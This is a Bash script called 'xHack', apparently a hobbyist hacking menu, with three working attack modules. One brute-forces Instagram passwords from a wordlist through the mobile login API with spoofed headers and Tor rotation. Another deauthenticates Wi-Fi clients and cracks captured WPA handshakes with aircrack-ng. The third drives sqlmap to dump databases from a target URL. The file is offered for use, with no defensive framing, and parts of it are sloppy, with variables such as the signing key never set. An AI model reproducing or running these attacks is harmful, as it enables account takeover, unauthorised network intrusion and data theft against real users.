#!/bin/bash
#coded by Me
#v1.0

green='\033[1;32m'
red='\e[1;91m'
yellow='\e[0m\e[1;93m'
lightgreen='\e[1;32m'
farblos='\e[0m'
BlueF='\e[1;34m'
cyan='\e[0;36m'
lightred='\e[101m'
blink='\e[5m'
magenta='\e[35m'

user="username"
wordlist="wordlist"
clear
command -v openssl > /dev/null 2>&1 || { echo >&2 "You need openssl to use this script"; exit 1; }
command -v tor > /dev/null 2>&1 || { echo >&2 "You need TOR to use this script"; }
command -v aircrack-ng > /dev/null 2>&1 || { echo >&2 "You need aircrack-ng to use this script"; exit 1; }
command -v sqlmap > /dev/null 2>&1 || { echo >&2 "You need sqlmap to use this script"; exit 1; }
banner() {
printf " \e[1;33m      \e[1;31m   _   _            _     \e[0m\n  "
printf " \e[1;33m __  _\e[1;31m| | | | __ _  ___| | __ \e[0m\n  "
printf " \e[1;33m \ \/ /\e[1;31m |_| |/ _  |/ __| |/ / \e[0m\n  "
printf " \e[1;33m  >  <\e[1;31m|  _  | (_| | (__|   <  \e[0m\n  "
printf " \e[1;33m /_/\_\\e[1;31m\_| |_|\____|\___|_|\_\ \e[0m\n  "
echo
printf " \e[34m coded by GamingToastbrot \e[0m\n"
printf " \e[34m v1.0 \e[0m\n"
 for i in {16..21} {21..16} ; do echo -en "  \e[38;5;${i}m#\e[0m" ; done ; echo
echo
}
show_modules() {
echo
echo -e "$green ------>$yellow      options                value   "
echo "              -------                -----   "
echo ""
echo -e "$green ------>$BlueF     Hack insta Acc $red           1     "
echo ""
echo ""
echo -e "$green ------>$BlueF     Hack Wlan   $red              2  $farblos "
echo ""
echo ""
echo -e "$green ------>$BlueF     read out databases $red       3  $farblos  "
echo ""
eingabe
}
hack_insta_options() {
echo ""
echo -e "$green ------>$yellow      options                value    "
echo "              -------                -----    "
echo ""
echo -e "$green ------> $BlueF     username $red              ${user:-   user}      "
echo ""
echo ""
echo -e "$green ------>   $BlueF   wordlist           $red    ${wl_pass:-wordlist} $farblos     "
echo ""
hack_acc
}
information() {
echo ""
echo -e "$green ------>$magenta coded by Fadester"
echo -e "$green ------>$magenta Follow me on"
echo -e "$green ------>$magenta github: https://github.com/Fadester"
echo -e "$green ------>$magenta instagram: Fadester_04"
echo -e "$green ------>$magenta snapchat: robinjoel04"
echo -e "$green ------>$magenta Twitter: Robin04"
echo -e "$green ------>$magenta Thank you for using xHack =) $farblos"
echo ""
}
changeip() {

  killall -HUP tor

}
hack_acc() {
read -p "┌─[hackInstaAcc]─[noob]
└──╼ $ " eingabe1
if [[ $eingabe1 == "show options" ]];
then
	hack_insta_options
  hack_acc
elif [[ $eingabe1 == "set requirements" ]];
then
  echo ""
  read -p $' ------> username: ' user
  checkaccount=$(curl -L -s https://www.instagram.com/$user/ | grep -c "the page may have been removed")
  if [[ "$checkaccount" == 1 ]]; then
    echo ""
    echo " ------> user don't exist"
    echo " ------> Try again"
    echo ""
    sleep 1
    hack_acc
  else
    read -p " ------> wordlist: " wl_pass
    wordlist_char=$(wc -l $wl_pass)
    echo -e " username=$green$user "
    echo -e "$farblos wordlist=$green$wordlist_char $farblos"
    echo [✔]
  fi
	hack_acc
elif [[ $eingabe1 == "clear" ]];
then
  clear
  banner
  hack_acc
elif [[ $eingabe1 == "exit" ]];
then
	eingabe
elif [[ $eingabe1 == "start" ]];
then

counter=0
turn=10
startline=1
endline=20

phone="$string8-$string4-$string4-$string4-$string12"
var2=$(echo $var | grep -o 'csrftoken=.*' | cut -d ';' -f1 | cut -d '=' -f2)
guid="$string8-$string4-$string4-$string4-$string12"
header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
string4=$(openssl rand -hex 32 | cut -c 1-4)
string12=$(openssl rand -hex 32 | cut -c 1-12)
string8=$(openssl rand -hex 32  | cut -c 1-8)
string16=$(openssl rand -hex 32 | cut -c 1-16)
device="android-$string16"
privoxy=$(sudo lsof -Pnl +M > /dev/null | grep ':8118')
printf "\n"
while [ "$counter" -lt 10 ]; do
for pass in $( sed -n ''$startline','$endline'p' $wl_pass); do
header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

data='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass'", "login_attempt_count":"0"}'

IFS=$'\n'

hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

printf "\e[1;77m[\e[0m\e[1;92m!\e[0m\e[1;77m] Try pass: \e[0m\e[1;93m %s\e[0m\n" $pass
IFS=$'\n'
var=$(curl -c cookie.$user -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq );
 if [[ $var == "challenge" ]]; then printf "\e[1;33m[*] Password found!\n " ; printf "\e[1;32mUsername: %s\n \e[1;32mPassword: %s\n" $user $pass ;printf "\e[0m"; eingabe; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n[+] Login Successful\n"; printf "Username: %s\nPassword: %s\n\e[0m" $user $pass ; eingabe; elif [[ $var == "Please wait" ]]; then echo "Please wait"; fi;

let counter++

curl -c cookie.$user -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq
let startline+=5
let endline+=5
sudo killall -HUP tor
done
done

  echo ""
  echo "   COMPLETE!"
  echo ""
  read -p "Do you want to do a second attack? y/n: " second
  echo ""
  if [[ $second == "y" ]];
  then
    hack_acc
  elif [[ $second == "Y" ]];
  then
    hack_acc
  elif [[ $second == "n" ]];
  then
    eingabe
  elif [[ $second == "N" ]];
  then
    eingabe
  else
    echo ""
    echo "invalid option"
fi
elif [[ $eingabe1 == "help" ]];
then
echo -e "$green ------>$magenta help = show this message"
echo -e "$green ------>$magenta show options = show requirements"
echo -e "$green ------>$magenta set requirements = set values"
echo -e "$green ------>$magenta start = start the attack"
echo -e "$green ------>$magenta clear = clear the window"
echo -e "$green ------>$magenta exit = go to start"
echo -e "$green ------>$magenta show info = show infortmations"
echo -e "$green ------>$red =D $farblos"
hack_acc
elif [[ $eingabe1 == "show info" ]];
then
  information
  hack_acc
elif [[ $eingabe1 == "show options" ]];
then
	information
	hack_acc
else
	echo invalid command
	hack_acc
fi


}

sql() {

echo -e "$green  ______                 __ $yellow              __  $red    __         __          __                             $farblos "
echo -e "$green |   __ \.-----.---.-.--|  |$yellow.-----.--.--.|  |_$red.--|  |.---.-.|  |_.---.-.|  |--.---.-.-----.-----.-----. $farblos "
echo -e "$green |      <|  -__|  _  |  _  |$yellow|  _  |  |  ||   _$red|  _  ||  _  ||   _|  _  ||  _  |  _  |__ --|  -__|__ --| $farblos "
echo -e "$green |___|__||_____|___._|_____|$yellow|_____|_____||____$red|_____||___._||____|___._||_____|___._|_____|_____|_____| $farblos "
echo
read -p "Target Adress: " target
sqlmap -u $target --users --dbs
read -p "Next? (y/n): " next
if [[ $next == "y" ]];
  then
    read -p "Database: " database
    sqlmap -u $target -D $database --tables
elif [[ $next == "Y" ]];
  then
    read -p "Database: " database
    sqlmap -u $target -D $database --tables
elif [[ $next == "n" ]];
  then
    eingabe
elif [[ $next == "N" ]];
  then
    eingabe
else
  eingabe
fi
read -p "Next? (y/n): " next2
if [[ $next2 == "y" ]];
  then
    read -p "Table: " table
    sqlmap -u $target -D $database -T $table --columns
elif [[ $next2 == "Y" ]];
  then
    read -p "Table: " table
    sqlmap -u $target -D $database -T $table --columns
elif [[ $next2 == "n" ]];
  then
    eingabe
elif [[ $next2 == "N" ]];
  then
    eingabe
else
  eingabe
fi

read -p "Next? (y/n): " next3
if [[ $next3 == "y" ]];
  then
    read -p "Column: " column
    sqlmap -u $target -D $database -T $table -C $column --dump
elif [[ $next3 == "Y" ]];
  then
    read -p "Column: " column
    sqlmap -u $target -D $database -T $table -C $column --dump
elif [[ $next3 == "n" ]];
  then
    eingabe
elif [[ $next3 == "N" ]];
  then
    eingabe
else
  eingabe
fi

echo COMPLETE
eingabe
}

hack_wlan() {

echo -e "$red __      __.__                 $green   ___ ___                __     $farblos "
echo -e "$red/  \    /  \  | _____    ____  $green  /   |   \_____    ____ |  | __ $farblos "
echo -e "$red\   \/\/   /  | \__  \  /    \ $green /    ~    \__  \ _/ ___\|  |/ / $farblos "
echo -e "$red \        /|  |__/ __ \|   |  \ $green\    Y    // __ \\  \___|    <  $farblos "
echo -e " $red \__/\  / |____(____  /___|  / $green \___|_  /(____  /\___  >__|_ \ $farblos "
echo -e " $red      \/            \/     \/      $green   \/      \/     \/     \/     $farblos "
echo ""
airmon-ng 
read -p "Interface: " interface
airmon-ng start $interface
read -p "Kill processes? (y/n): " kill_pro
if [[ $kill_pro == "y" ]]; then
	read -p "Kill 1.: " kill1
	read -p "Kill 2.: " kill2
	read -p "Kill 3.: " kill3
	read -p "Kill 4.: " kill4
	read -p "Kill 5.: " kill5
	kill $kill1
	kill $kill2
	kill $kill3
	kill $kill4
	kill $kill5
elif [[ $kill_pro == "n" ]]; then 
	echo -e "$green OK! $farblos"
fi
airmon-ng
read -p "New interface? (y/n): " new_interface
if [[ $new_interface == "y" ]]; then
	read -p "Interface: " interface
fi
airmon-ng start $interface
sleep 1
echo -e "$yellow Copy BSSID (BSSID) & Channel (CH) $farblos" 
sleep 3.5
xterm -T "  " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e airodump-ng $interface
sleep 2
read -p "$green BSSID: $farblos " bssid  
read -p "$green Channel: $farblos " ch
read -p "$yellow Name for handshake: " handshake_name 
echo -e "$yellow Close the windows when you have the handshake $farblos " 
sleep 2
xterm -T " xHack " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e airodump-ng --$bssid -c $ch -w $handshake_name $interface & sleep 1 &
xterm -T " xHack " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e aireplay-ng -0 50 -a $bssid $interface 
sleep 2
read -p "Do you have the handshake? (y/n): " hs
if [[ $hs == "y" ]]; then
	read -p "Handshake (.cap): " handshake
elif [[ $hs == "n" ]]; then 
xterm -T " xHack " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e aireplay-ng -0 100 -a $bssid $interface
sleep 2
read -p "$green Handshake (.cap): $farblos" handshake 
fi
sleep 1.5
echo -e "$red Start attack... $farblos"
while true; do 
	read -p "Wordlist: " wordlist
	xterm -T " xHack " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e aircrack-ng -w $wordlist $handshake $interface
	sleep 2
	read -p "Key found? (y/n): " key_found
	if [[ $key_found == "y" ]]; then 
		eingabe 
	elif [[ $key_found == "n" ]]; then
		read -p "New wordlist: " new_wl
		xterm -T " xHack " -bg black -fg white -fa monaco -fs 9 -geometry 110x16-0+0 -e aircrack-ng -w $new_wl $handshake $interface
		sleep 2
	fi
done



}

eingabe() {
echo ""
read -p "┌─[xHack]─[noob]
└──╼ $ " eingabe

if [[ $eingabe == "show modules" ]];
then
	show_modules
elif [[ $eingabe == "use 1" ]];
then
	hack_acc
elif [[ $eingabe == "use 2" ]]; 
then
	hack_wlan
elif [[ $eingabe == "use 3" ]];
then
	sql
elif [[ $eingabe == "help" ]];
then
echo ""
echo -e "$green ------>$magenta help = show this message"
echo -e "$green ------>$magenta use 'value' = go to 1,2,3...."
echo -e "$green ------>$magenta show modules = show all modules"
echo -e "$green ------>$magenta show info = show infortmations"
echo -e "$green ------>$magenta exit = exit"
echo -e "$green ------>$red :D $farblos"
eingabe
elif [[ $eingabe == "show info" ]];
then
  information
  eingabe
elif [[ $eingabe == "clear" ]];
then
	clear
	banner
	eingabe
elif [[ $eingabe == "exit" ]];
then
  exit
else
	echo ""
	echo invalid command
	eingabe
fi
}

banner
eingabe
